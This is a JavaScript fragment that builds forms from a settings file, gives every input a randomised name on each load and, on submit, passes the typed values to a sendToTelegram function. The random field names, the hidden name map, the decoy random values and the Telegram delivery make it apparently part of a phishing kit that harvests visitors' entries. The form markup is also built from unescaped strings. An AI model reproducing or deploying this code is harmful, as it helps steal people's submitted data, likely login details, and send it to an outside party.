function randomName(len = 12) {
  let chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  let out = '';
  for (let i = 0; i < len; i++) out += chars[Math.floor(Math.random() * chars.length)];
  return out;
}

async function injectFields(containerId, section, formTitle, submitType) {
  const container = document.getElementById(containerId);
  if (!container) return;
  const settings = await (await fetch('settings.json?' + Date.now())).json();
  const fields = settings.fields[section];
  window.randomFieldNames = window.randomFieldNames || {};
  window.randomFieldNames[section] = {};
  container.innerHTML = `<form id="${section}Form"><h3>${formTitle}</h3></form>`;
  const form = container.querySelector('form');
  fields.forEach(fld => {
    let randName = randomName();
    window.randomFieldNames[section][fld.name] = randName;
    let attrs = `
      name="${randName}"
      type="${fld.type}"
      ${fld.placeholder ? `placeholder="${fld.placeholder}"` : ''}
      ${fld.required ? 'required' : ''}
      ${fld.pattern ? `pattern="${fld.pattern}"` : ''}
      ${fld.min ? `min="${fld.min}"` : ''}
      ${fld.max ? `max="${fld.max}"` : ''}
    `;
    form.innerHTML += `
      <label>${fld.label}:
        <input ${attrs.trim()}>
      </label>
    `;
  });
  form.innerHTML += `<button type="submit">Submit</button>`;
  form.onsubmit = async function(e){
    e.preventDefault();
    let data = {};
    fields.forEach(fld => {
      let rname = window.randomFieldNames[section][fld.name];
      if (fld.randomize) {
        let l = fld.max ? Number(fld.max) : 10;
        data[fld.name] = randomName(l);
      } else {
        data[fld.name] = form.querySelector(`[name="${rname}"]`).value;
      }
    });
    sendToTelegram(submitType, data);
  }
}